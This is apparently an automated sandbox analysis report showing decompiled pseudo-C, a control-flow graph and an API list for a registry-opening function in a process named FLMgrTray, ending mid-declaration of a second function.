                                                                                        control_flow_graph 1498 182cc0-182d0d 1499 182d10-182d19 1498->1499 1499->1499 1500 182d1b-182d53 call 163540 call 16c3d0 call 1828a0 1499->1500 1507 182d55-182d84 memmove 1500->1507 1508 182d87-182d96 1500->1508 1507->1508 1509 182d98-182d9a 1508->1509 1510 182d9c 1508->1510 1509->1510 1511 182d9f-182dc6 RegOpenKeyExW 1509->1511 1510->1511 1512 182dcc-182dd5 1511->1512 1513 182f05-182f14 1511->1513 1516 183169-18317a call 182740 1512->1516 1517 182ddb-182ddd 1512->1517 1514 182f1a 1513->1514 1515 182f16-182f18 1513->1515 1518 182f1d-182f43 RegOpenKeyExW 1514->1518 1515->1514 1515->1518 1524 18317f-183185 1516->1524 1517->1516 1519 182de3-182e26 call 16c3d0 call 1824f0 call 182490 call 176890 1517->1519 1521 182f49-182f52 1518->1521 1522 183046-183055 1518->1522 1557 182e28-182e3a 1519->1557 1558 182e5c-182e7a 1519->1558 1521->1516 1529 182f58-182f5a 1521->1529 1527 18305b 1522->1527 1528 183057-183059 1522->1528 1525 1831b9-1831d6 call 1755f4 1524->1525 1526 183187-183199 1524->1526 1531 18319b-1831a9 1526->1531 1532 1831af-1831b6 call 175733 1526->1532 1533 18305e-18307a RegOpenKeyExW 1527->1533 1528->1527 1528->1533 1529->1516 1535 182f60-182fa3 call 16c3d0 call 1824f0 call 182490 call 176890 1529->1535 1531->1532 1537 182eff _invalid_parameter_noinfo_noreturn 1531->1537 1532->1525 1533->1524 1539 183080-183085 1533->1539 1575 182fd9-182ff7 1535->1575 1576 182fa5-182fb7 1535->1576 1537->1513 1539->1516 1544 18308b-18308d 1539->1544 1544->1516 1548 183093-1830d6 call 16c3d0 call 1824f0 call 182490 call 176890 1544->1548 1594 1830d8-1830ea 1548->1594 1595 18310a-183128 1548->1595 1561 182e3c-182e4a 1557->1561 1562 182e52-182e59 call 175733 1557->1562 1563 182e7c-182e8e 1558->1563 1564 182eb0-182ecd 1558->1564 1561->1562 1568 182e4c _invalid_parameter_noinfo_noreturn 1561->1568 1562->1558 1570 182e90-182e9e 1563->1570 1571 182ea6-182ead call 175733 1563->1571 1564->1516 1566 182ed3-182ee5 1564->1566 1573 182eeb-182ef9 1566->1573 1574 18315f-183166 call 175733 1566->1574 1568->1562 1570->1571 1578 182ea0 _invalid_parameter_noinfo_noreturn 1570->1578 1571->1564 1573->1537 1573->1574 1574->1516 1583 182ff9-18300b 1575->1583 1584 18302d-18303d 1575->1584 1581 182fb9-182fc7 1576->1581 1582 182fcf-182fd6 call 175733 1576->1582 1578->1571 1581->1582 1589 182fc9 _invalid_parameter_noinfo_noreturn 1581->1589 1582->1575 1591 18300d-18301b 1583->1591 1592 183023-18302a call 175733 1583->1592 1584->1522 1589->1582 1591->1592 1597 18301d _invalid_parameter_noinfo_noreturn 1591->1597 1592->1584 1599 1830ec-1830fa 1594->1599 1600 183100-183107 call 175733 1594->1600 1595->1584 1601 18312e-183140 1595->1601 1597->1592 1599->1537 1599->1600 1600->1595 1601->1592 1604 183146-183154 1601->1604 1604->1592 1606 18315a 1604->1606 1606->1537
                                                                                        C-Code - Quality: 69%
                                                                                        			E00182CC0(void** __ecx, intOrPtr* _a4) {
                                                                                        				int _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				char _v44;
                                                                                        				signed int _v48;
                                                                                        				int _v52;
                                                                                        				short _v68;
                                                                                        				signed int _v72;
                                                                                        				int _v76;
                                                                                        				short _v92;
                                                                                        				short* _v96;
                                                                                        				char _v116;
                                                                                        				void* _v120;
                                                                                        				int _v124;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t148;
                                                                                        				signed int _t149;
                                                                                        				intOrPtr _t152;
                                                                                        				void* _t157;
                                                                                        				long _t158;
                                                                                        				long _t163;
                                                                                        				void* _t164;
                                                                                        				signed int _t165;
                                                                                        				intOrPtr _t168;
                                                                                        				void* _t178;
                                                                                        				void* _t180;
                                                                                        				int _t183;
                                                                                        				intOrPtr _t184;
                                                                                        				intOrPtr _t187;
                                                                                        				intOrPtr _t190;
                                                                                        				void* _t198;
                                                                                        				void* _t200;
                                                                                        				intOrPtr _t204;
                                                                                        				void* _t212;
                                                                                        				void* _t214;
                                                                                        				intOrPtr _t217;
                                                                                        				intOrPtr _t220;
                                                                                        				signed int _t223;
                                                                                        				signed int _t224;
                                                                                        				void* _t228;
                                                                                        				signed int _t229;
                                                                                        				signed int _t230;
                                                                                        				intOrPtr* _t233;
                                                                                        				short* _t239;
                                                                                        				void* _t240;
                                                                                        				short* _t242;
                                                                                        				char _t247;
                                                                                        				char _t252;
                                                                                        				short _t253;
                                                                                        				short _t254;
                                                                                        				short _t258;
                                                                                        				short _t262;
                                                                                        				short _t263;
                                                                                        				signed int _t273;
                                                                                        				void* _t274;
                                                                                        				signed int _t275;
                                                                                        				signed int _t276;
                                                                                        				void* _t277;
                                                                                        				void* _t278;
                                                                                        				signed int _t279;
                                                                                        				signed int _t280;
                                                                                        				void* _t281;
                                                                                        				signed int _t282;
                                                                                        				signed int _t283;
                                                                                        				void* _t284;
                                                                                        				void* _t285;
                                                                                        				void* _t289;
                                                                                        				int _t291;
                                                                                        				void** _t294;
                                                                                        				signed int _t296;
                                                                                        				void* _t297;
                                                                                        				void* _t298;
                                                                                        				void* _t299;
                                                                                        				void* _t300;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E438);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t298 = _t297 - 0x6c;
                                                                                        				_t148 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t149 = _t148 ^ _t296;
                                                                                        				_v20 = _t149;
                                                                                        				_push(_t228);
                                                                                        				_push(_t149);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t294 = __ecx;
                                                                                        				_t266 = _a4;
                                                                                        				_t233 = _a4;
                                                                                        				_v120 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_v24 = 7;
                                                                                        				_v44 = 0;
                                                                                        				_t8 = _t233 + 2; // 0x17ed9d
                                                                                        				_t289 = _t8;
                                                                                        				goto L1;
                                                                                        				L7:
                                                                                        				_v124 = _t291 | 0x00020019;
                                                                                        				_t158 = RegOpenKeyExW(_t157, _t239, 0, _v124,  &_v120); // executed
                                                                                        				_t294[0xb] = _t158;
                                                                                        				_t230 = _t229 & 0xffffff00 | _t158 == 0x00000000;
                                                                                        				if(_t158 != 0) {
                                                                                        					L25:
                                                                                        					_t240 =  *_t294;
                                                                                        					_t272 =  >=  ? _v44 :  &_v44;
                                                                                        					if(_t240 == 0 || _t230 == 0) {
                                                                                        						_t240 = _t294[1];
                                                                                        					}
                                                                                        					_v124 = _t291 | 0x00020009;
                                                                                        					_t163 = RegOpenKeyExW(_t240, _t272, 0, _v124,  &_v120); // executed
                                                                                        					_t294[0xb] = _t163;
                                                                                        					_t230 = _t230 & 0xffffff00 | _t163 == 0x00000000;
                                                                                        					if(_t163 != 0) {
                                                                                        						__eflags = _v24 - 8;
                                                                                        						_t164 =  *_t294;
                                                                                        						_t242 =  >=  ? _v44 :  &_v44;
                                                                                        						__eflags = _t164;
                                                                                        						if(_t164 == 0) {
                                                                                        							L44:
                                                                                        							_t164 = _t294[1];
                                                                                        							L45:
                                                                                        							_t272 =  &_v120;
                                                                                        							_t291 = _t291 | 0x00000001;
                                                                                        							_t165 = RegOpenKeyExW(_t164, _t242, 0, _t291,  &_v120);
                                                                                        							__eflags = _t165;
                                                                                        							_t294[0xb] = _t165;
                                                                                        							_t230 = _t230 & 0xffffff00 | _t165 == 0x00000000;
                                                                                        							__eflags = _t165;
                                                                                        							if(_t165 != 0) {
                                                                                        								goto L58;
                                                                                        							}
                                                                                        							_t294[0xa] = _t291;
                                                                                        							__eflags =  *_t294 - _t165;
                                                                                        							if( *_t294 == _t165) {
                                                                                        								goto L57;
                                                                                        							}
                                                                                        							__eflags = _t230;
                                                                                        							if(_t230 == 0) {
                                                                                        								goto L57;
                                                                                        							}
                                                                                        							E0016C3D0( &_v116,  &(_t294[3]));
                                                                                        							_v8 = 5;
                                                                                        							_t178 = E001824F0(__eflags,  &_v68,  &_v116, 0x5c);
                                                                                        							_v8 = 6;
                                                                                        							_t180 = E00182490( &_v92, _t178,  &_v44);
                                                                                        							_t300 = _t300 + 0x18;
                                                                                        							E00176890( &_v44, _t180);
                                                                                        							_t275 = _v72;
                                                                                        							__eflags = _t275 - 8;
                                                                                        							if(_t275 < 8) {
                                                                                        								L52:
                                                                                        								_t276 = _v48;
                                                                                        								_v76 = 0;
                                                                                        								_v72 = 7;
                                                                                        								_v92 = 0;
                                                                                        								_v8 = 5;
                                                                                        								__eflags = _t276 - 8;
                                                                                        								if(_t276 < 8) {
                                                                                        									goto L41;
                                                                                        								}
                                                                                        								_t253 = _v68;
                                                                                        								_t277 = 2 + _t276 * 2;
                                                                                        								_t187 = _t253;
                                                                                        								__eflags = _t277 - 0x1000;
                                                                                        								if(_t277 < 0x1000) {
                                                                                        									goto L40;
                                                                                        								}
                                                                                        								_t253 =  *((intOrPtr*)(_t253 - 4));
                                                                                        								_t277 = _t277 + 0x23;
                                                                                        								_t187 = _t187 - _t253 + 0xfffffffc;
                                                                                        								__eflags = _t187 - 0x1f;
                                                                                        								if(_t187 <= 0x1f) {
                                                                                        									goto L40;
                                                                                        								}
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							_t254 = _v92;
                                                                                        							_t278 = 2 + _t275 * 2;
                                                                                        							_t190 = _t254;
                                                                                        							__eflags = _t278 - 0x1000;
                                                                                        							if(_t278 < 0x1000) {
                                                                                        								L51:
                                                                                        								_push(_t278);
                                                                                        								E00175733(_t190, _t254);
                                                                                        								_t300 = _t300 + 8;
                                                                                        								goto L52;
                                                                                        							}
                                                                                        							_t254 =  *((intOrPtr*)(_t254 - 4));
                                                                                        							_t278 = _t278 + 0x23;
                                                                                        							_t190 = _t190 - _t254 + 0xfffffffc;
                                                                                        							__eflags = _t190 - 0x1f;
                                                                                        							if(_t190 > 0x1f) {
                                                                                        								goto L24;
                                                                                        							}
                                                                                        							goto L51;
                                                                                        						}
                                                                                        						__eflags = _t230;
                                                                                        						if(_t230 != 0) {
                                                                                        							goto L45;
                                                                                        						}
                                                                                        						goto L44;
                                                                                        					} else {
                                                                                        						_t294[0xa] = _v124;
                                                                                        						if( *_t294 == 0) {
                                                                                        							L57:
                                                                                        							__eflags = _v24 - 8;
                                                                                        							_t172 =  >=  ? _v44 :  &_v44;
                                                                                        							E00182740(_t294, _t272, _v120,  >=  ? _v44 :  &_v44);
                                                                                        							L58:
                                                                                        							_t273 = _v24;
                                                                                        							__eflags = _t273 - 8;
                                                                                        							if(_t273 < 8) {
                                                                                        								L62:
                                                                                        								 *[fs:0x0] = _v16;
                                                                                        								__eflags = _v20 ^ _t296;
                                                                                        								return E001755F4(_v20 ^ _t296);
                                                                                        							}
                                                                                        							_t247 = _v44;
                                                                                        							_t274 = 2 + _t273 * 2;
                                                                                        							_t168 = _t247;
                                                                                        							__eflags = _t274 - 0x1000;
                                                                                        							if(_t274 < 0x1000) {
                                                                                        								L61:
                                                                                        								_push(_t274);
                                                                                        								E00175733(_t168, _t247);
                                                                                        								goto L62;
                                                                                        							}
                                                                                        							_t247 =  *((intOrPtr*)(_t247 - 4));
                                                                                        							_t274 = _t274 + 0x23;
                                                                                        							_t168 = _t168 - _t247 + 0xfffffffc;
                                                                                        							__eflags = _t168 - 0x1f;
                                                                                        							if(_t168 > 0x1f) {
                                                                                        								L24:
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								goto L25;
                                                                                        							}
                                                                                        							goto L61;
                                                                                        						}
                                                                                        						_t331 = _t230;
                                                                                        						if(_t230 == 0) {
                                                                                        							goto L57;
                                                                                        						}
                                                                                        						E0016C3D0( &_v116,  &(_t294[3]));
                                                                                        						_v8 = 3;
                                                                                        						_t198 = E001824F0(_t331,  &_v68,  &_v116, 0x5c);
                                                                                        						_v8 = 4;
                                                                                        						_t200 = E00182490( &_v92, _t198,  &_v44);
                                                                                        						_t300 = _t300 + 0x18;
                                                                                        						E00176890( &_v44, _t200);
                                                                                        						_t279 = _v72;
                                                                                        						if(_t279 >= 8) {
                                                                                        							_t258 = _v92;
                                                                                        							_t281 = 2 + _t279 * 2;
                                                                                        							_t204 = _t258;
                                                                                        							if(_t281 >= 0x1000) {
                                                                                        								_t258 =  *((intOrPtr*)(_t258 - 4));
                                                                                        								_t281 = _t281 + 0x23;
                                                                                        								if(_t204 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t281);
                                                                                        							E00175733(_t204, _t258);
                                                                                        							_t300 = _t300 + 8;
                                                                                        						}
                                                                                        						_t280 = _v48;
                                                                                        						_v76 = 0;
                                                                                        						_v72 = 7;
                                                                                        						_v92 = 0;
                                                                                        						_v8 = 3;
                                                                                        						if(_t280 < 8) {
                                                                                        							L41:
                                                                                        							_t183 = 0;
                                                                                        							_v52 = 0;
                                                                                        							_v48 = 7;
                                                                                        							_v68 = 0;
                                                                                        							L21:
                                                                                        							_t272 = _v96;
                                                                                        							_v8 = _t183;
                                                                                        							if(_t272 < 8) {
                                                                                        								goto L57;
                                                                                        							}
                                                                                        							_t252 = _v116;
                                                                                        							_t272 = 2 + _t272 * 2;
                                                                                        							_t184 = _t252;
                                                                                        							if(_t272 < 0x1000) {
                                                                                        								L56:
                                                                                        								_push(_t272);
                                                                                        								E00175733(_t184, _t252);
                                                                                        								_t300 = _t300 + 8;
                                                                                        								goto L57;
                                                                                        							}
                                                                                        							_t252 =  *((intOrPtr*)(_t252 - 4));
                                                                                        							_t272 =  &(_t272[0x11]);
                                                                                        							if(_t184 <= 0x1f) {
                                                                                        								goto L56;
                                                                                        							}
                                                                                        							goto L24;
                                                                                        						} else {
                                                                                        							_t253 = _v68;
                                                                                        							_t277 = 2 + _t280 * 2;
                                                                                        							_t187 = _t253;
                                                                                        							if(_t277 >= 0x1000) {
                                                                                        								_t253 =  *((intOrPtr*)(_t253 - 4));
                                                                                        								_t277 = _t277 + 0x23;
                                                                                        								if(_t187 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							L40:
                                                                                        							_push(_t277);
                                                                                        							E00175733(_t187, _t253);
                                                                                        							_t300 = _t300 + 8;
                                                                                        							goto L41;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				_t294[0xa] = _v124;
                                                                                        				if( *_t294 == 0) {
                                                                                        					goto L57;
                                                                                        				}
                                                                                        				_t314 = _t230;
                                                                                        				if(_t230 == 0) {
                                                                                        					goto L57;
                                                                                        				}
                                                                                        				E0016C3D0( &_v116,  &(_t294[3]));
                                                                                        				_v8 = 1;
                                                                                        				_t212 = E001824F0(_t314,  &_v92,  &_v116, 0x5c);
                                                                                        				_v8 = 2;
                                                                                        				_t214 = E00182490( &_v68, _t212,  &_v44);
                                                                                        				_t300 = _t300 + 0x18;
                                                                                        				E00176890( &_v44, _t214);
                                                                                        				_t282 = _v48;
                                                                                        				if(_t282 >= 8) {
                                                                                        					_t263 = _v68;
                                                                                        					_t285 = 2 + _t282 * 2;
                                                                                        					_t220 = _t263;
                                                                                        					if(_t285 >= 0x1000) {
                                                                                        						_t263 =  *((intOrPtr*)(_t263 - 4));
                                                                                        						_t285 = _t285 + 0x23;
                                                                                        						if(_t220 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t285);
                                                                                        					E00175733(_t220, _t263);
                                                                                        					_t300 = _t300 + 8;
                                                                                        				}
                                                                                        				_t283 = _v72;
                                                                                        				_v52 = 0;
                                                                                        				_v48 = 7;
                                                                                        				_v68 = 0;
                                                                                        				_v8 = 1;
                                                                                        				if(_t283 >= 8) {
                                                                                        					_t262 = _v92;
                                                                                        					_t284 = 2 + _t283 * 2;
                                                                                        					_t217 = _t262;
                                                                                        					if(_t284 >= 0x1000) {
                                                                                        						_t262 =  *((intOrPtr*)(_t262 - 4));
                                                                                        						_t284 = _t284 + 0x23;
                                                                                        						if(_t217 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t284);
                                                                                        					E00175733(_t217, _t262);
                                                                                        					_t300 = _t300 + 8;
                                                                                        				}
                                                                                        				_t183 = 0;
                                                                                        				_v76 = 0;
                                                                                        				_v72 = 7;
                                                                                        				_v92 = 0;
                                                                                        				goto L21;
                                                                                        				L1:
                                                                                        				_t152 =  *_t233;
                                                                                        				_t233 = _t233 + 2;
                                                                                        				if(_t152 != 0) {
                                                                                        					goto L1;
                                                                                        				} else {
                                                                                        					_push(_t233 - _t289 >> 1);
                                                                                        					E00163540(_t228, _t266, _t289, _t266);
                                                                                        					_t299 = _t298 - 0x18;
                                                                                        					_v8 = 0;
                                                                                        					E0016C3D0(_t299,  &_v44);
                                                                                        					_t229 = E001828A0(_t266, _t289);
                                                                                        					_t300 = _t299 + 0x18;
                                                                                        					_t291 = _t294[0xa] & 0x00000300;
                                                                                        					if(_t229 == 0) {
                                                                                        						_t223 = _v28;
                                                                                        						_t287 =  <  ? _t223 : 1;
                                                                                        						_t265 =  >=  ? _v44 :  &_v44;
                                                                                        						_t224 = _t223 - 1;
                                                                                        						_v28 = _t224;
                                                                                        						memmove( >=  ? _v44 :  &_v44, ( >=  ? _v44 :  &_v44) + ( <  ? _t223 : 1) * 2, 2 + _t224 * 2);
                                                                                        						_t300 = _t300 + 0xc;
                                                                                        					}
                                                                                        					_t157 =  *_t294;
                                                                                        					_t239 =  >=  ? _v44 :  &_v44;
                                                                                        					if(_t157 == 0 || _t229 == 0) {
                                                                                        						_t157 = _t294[1];
                                                                                        					}
                                                                                        					goto L7;
                                                                                        				}
                                                                                        			}

















































































                                                                                        0x00182cc3
                                                                                        0x00182cc5
                                                                                        0x00182cd0
                                                                                        0x00182cd1
                                                                                        0x00182cd4
                                                                                        0x00182cd9
                                                                                        0x00182cdb
                                                                                        0x00182cde
                                                                                        0x00182ce1
                                                                                        0x00182ce5
                                                                                        0x00182ceb
                                                                                        0x00182ced
                                                                                        0x00182cf2
                                                                                        0x00182cf4
                                                                                        0x00182cfb
                                                                                        0x00182d02
                                                                                        0x00182d09
                                                                                        0x00182d0d
                                                                                        0x00182d0d
                                                                                        0x00182d0d
                                                                                        0x00182d9f
                                                                                        0x00182da7
                                                                                        0x00182db6
                                                                                        0x00182dbe
                                                                                        0x00182dc1
                                                                                        0x00182dc6
                                                                                        0x00182f05
                                                                                        0x00182f0c
                                                                                        0x00182f0e
                                                                                        0x00182f14
                                                                                        0x00182f1a
                                                                                        0x00182f1a
                                                                                        0x00182f24
                                                                                        0x00182f33
                                                                                        0x00182f3b
                                                                                        0x00182f3e
                                                                                        0x00182f43
                                                                                        0x00183046
                                                                                        0x0018304d
                                                                                        0x0018304f
                                                                                        0x00183053
                                                                                        0x00183055
                                                                                        0x0018305b
                                                                                        0x0018305b
                                                                                        0x0018305e
                                                                                        0x0018305e
                                                                                        0x00183061
                                                                                        0x0018306a
                                                                                        0x00183070
                                                                                        0x00183072
                                                                                        0x00183075
                                                                                        0x00183078
                                                                                        0x0018307a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00183080
                                                                                        0x00183083
                                                                                        0x00183085
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018308b
                                                                                        0x0018308d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018309a
                                                                                        0x001830a4
                                                                                        0x001830ad
                                                                                        0x001830b5
                                                                                        0x001830bf
                                                                                        0x001830c4
                                                                                        0x001830cb
                                                                                        0x001830d0
                                                                                        0x001830d3
                                                                                        0x001830d6
                                                                                        0x0018310a
                                                                                        0x0018310a
                                                                                        0x0018310f
                                                                                        0x00183116
                                                                                        0x0018311d
                                                                                        0x00183121
                                                                                        0x00183125
                                                                                        0x00183128
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018312e
                                                                                        0x00183131
                                                                                        0x00183138
                                                                                        0x0018313a
                                                                                        0x00183140
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00183146
                                                                                        0x00183149
                                                                                        0x0018314e
                                                                                        0x00183151
                                                                                        0x00183154
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018315a
                                                                                        0x001830d8
                                                                                        0x001830db
                                                                                        0x001830e2
                                                                                        0x001830e4
                                                                                        0x001830ea
                                                                                        0x00183100
                                                                                        0x00183100
                                                                                        0x00183102
                                                                                        0x00183107
                                                                                        0x00000000
                                                                                        0x00183107
                                                                                        0x001830ec
                                                                                        0x001830ef
                                                                                        0x001830f4
                                                                                        0x001830f7
                                                                                        0x001830fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001830fa
                                                                                        0x00183057
                                                                                        0x00183059
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00182f49
                                                                                        0x00182f4f
                                                                                        0x00182f52
                                                                                        0x00183169
                                                                                        0x00183169
                                                                                        0x00183172
                                                                                        0x0018317a
                                                                                        0x0018317f
                                                                                        0x0018317f
                                                                                        0x00183182
                                                                                        0x00183185
                                                                                        0x001831b9
                                                                                        0x001831be
                                                                                        0x001831cc
                                                                                        0x001831d6
                                                                                        0x001831d6
                                                                                        0x00183187
                                                                                        0x0018318a
                                                                                        0x00183191
                                                                                        0x00183193
                                                                                        0x00183199
                                                                                        0x001831af
                                                                                        0x001831af
                                                                                        0x001831b1
                                                                                        0x00000000
                                                                                        0x001831b6
                                                                                        0x0018319b
                                                                                        0x0018319e
                                                                                        0x001831a3
                                                                                        0x001831a6
                                                                                        0x001831a9
                                                                                        0x00182eff
                                                                                        0x00182eff
                                                                                        0x00000000
                                                                                        0x00182eff
                                                                                        0x00000000
                                                                                        0x001831a9
                                                                                        0x00182f58
                                                                                        0x00182f5a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00182f67
                                                                                        0x00182f71
                                                                                        0x00182f7a
                                                                                        0x00182f82
                                                                                        0x00182f8c
                                                                                        0x00182f91
                                                                                        0x00182f98
                                                                                        0x00182f9d
                                                                                        0x00182fa3
                                                                                        0x00182fa5
                                                                                        0x00182fa8
                                                                                        0x00182faf
                                                                                        0x00182fb7
                                                                                        0x00182fb9
                                                                                        0x00182fbc
                                                                                        0x00182fc7
                                                                                        0x00182fc9
                                                                                        0x00182fc9
                                                                                        0x00182fc7
                                                                                        0x00182fcf
                                                                                        0x00182fd1
                                                                                        0x00182fd6
                                                                                        0x00182fd6
                                                                                        0x00182fd9
                                                                                        0x00182fde
                                                                                        0x00182fe5
                                                                                        0x00182fec
                                                                                        0x00182ff0
                                                                                        0x00182ff7
                                                                                        0x0018302d
                                                                                        0x0018302d
                                                                                        0x0018302f
                                                                                        0x00183036
                                                                                        0x0018303d
                                                                                        0x00182ec4
                                                                                        0x00182ec4
                                                                                        0x00182ec7
                                                                                        0x00182ecd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00182ed3
                                                                                        0x00182ed6
                                                                                        0x00182edd
                                                                                        0x00182ee5
                                                                                        0x0018315f
                                                                                        0x0018315f
                                                                                        0x00183161
                                                                                        0x00183166
                                                                                        0x00000000
                                                                                        0x00183166
                                                                                        0x00182eeb
                                                                                        0x00182eee
                                                                                        0x00182ef9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00182ff9
                                                                                        0x00182ff9
                                                                                        0x00182ffc
                                                                                        0x00183003
                                                                                        0x0018300b
                                                                                        0x0018300d
                                                                                        0x00183010
                                                                                        0x0018301b
                                                                                        0x0018301d
                                                                                        0x0018301d
                                                                                        0x0018301b
                                                                                        0x00183023
                                                                                        0x00183023
                                                                                        0x00183025
                                                                                        0x0018302a
                                                                                        0x00000000
                                                                                        0x0018302a
                                                                                        0x00182ff7
                                                                                        0x00182f43
                                                                                        0x00182dd2
                                                                                        0x00182dd5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00182ddb
                                                                                        0x00182ddd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00182dea
                                                                                        0x00182df4
                                                                                        0x00182dfd
                                                                                        0x00182e05
                                                                                        0x00182e0f
                                                                                        0x00182e14
                                                                                        0x00182e1b
                                                                                        0x00182e20
                                                                                        0x00182e26
                                                                                        0x00182e28
                                                                                        0x00182e2b
                                                                                        0x00182e32
                                                                                        0x00182e3a
                                                                                        0x00182e3c
                                                                                        0x00182e3f
                                                                                        0x00182e4a
                                                                                        0x00182e4c
                                                                                        0x00182e4c
                                                                                        0x00182e4a
                                                                                        0x00182e52
                                                                                        0x00182e54
                                                                                        0x00182e59
                                                                                        0x00182e59
                                                                                        0x00182e5c
                                                                                        0x00182e61
                                                                                        0x00182e68
                                                                                        0x00182e6f
                                                                                        0x00182e73
                                                                                        0x00182e7a
                                                                                        0x00182e7c
                                                                                        0x00182e7f
                                                                                        0x00182e86
                                                                                        0x00182e8e
                                                                                        0x00182e90
                                                                                        0x00182e93
                                                                                        0x00182e9e
                                                                                        0x00182ea0
                                                                                        0x00182ea0
                                                                                        0x00182e9e
                                                                                        0x00182ea6
                                                                                        0x00182ea8
                                                                                        0x00182ead
                                                                                        0x00182ead
                                                                                        0x00182eb0
                                                                                        0x00182eb2
                                                                                        0x00182eb9
                                                                                        0x00182ec0
                                                                                        0x00000000
                                                                                        0x00182d10
                                                                                        0x00182d10
                                                                                        0x00182d13
                                                                                        0x00182d19
                                                                                        0x00000000
                                                                                        0x00182d1b
                                                                                        0x00182d1f
                                                                                        0x00182d24
                                                                                        0x00182d29
                                                                                        0x00182d2c
                                                                                        0x00182d39
                                                                                        0x00182d46
                                                                                        0x00182d48
                                                                                        0x00182d4b
                                                                                        0x00182d53
                                                                                        0x00182d55
                                                                                        0x00182d62
                                                                                        0x00182d69
                                                                                        0x00182d6d
                                                                                        0x00182d6f
                                                                                        0x00182d7f
                                                                                        0x00182d84
                                                                                        0x00182d84
                                                                                        0x00182d8e
                                                                                        0x00182d90
                                                                                        0x00182d96
                                                                                        0x00182d9c
                                                                                        0x00182d9c
                                                                                        0x00000000
                                                                                        0x00182d96

                                                                                        APIs
                                                                                        • memmove.VCRUNTIME140(?,00000000,00000000), ref: 00182D7F
                                                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 00182DB6
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?), ref: 00182E4C
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?), ref: 00182EA0
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?), ref: 00182EFF
                                                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 00182F33
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?), ref: 00182FC9
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?,?,?,?), ref: 0018301D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0018306A
                                                                                          • Part of subcall function 00182740: RegFlushKey.ADVAPI32(?,?,?,?,0018317F,?,?), ref: 00182754
                                                                                          • Part of subcall function 00182740: RegCloseKey.ADVAPI32(?,?,?,?,0018317F,?,?), ref: 0018275D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Open$CloseFlushmemmove
                                                                                        • String ID:
                                                                                        • API String ID: 3494867563-0
                                                                                        • Opcode ID: b2cd47ab43b21457041a3678e277f7ff1fbd35b7154187bee3e7c34a2c88ab6c
                                                                                        • Instruction ID: b3acfee758addea1f33a902e5efe314dcbfbf8ac1bef6fcee0e910eb1148601d
                                                                                        • Opcode Fuzzy Hash: b2cd47ab43b21457041a3678e277f7ff1fbd35b7154187bee3e7c34a2c88ab6c
                                                                                        • Instruction Fuzzy Hash: 19E1B171A00208DFDB15EBA4CC89BEEBBB6AF98710F24411DE415E7295E734AB45CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 44%
                                                                                        			E00181B20(void* __ebx, void* __edi, void* __esi, WCHAR* _a4, char _a8) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				short _v2068;
                                                                                        				int _v2072;
                                                                                        				int _v2076;
                                                                                        				short _v2092;
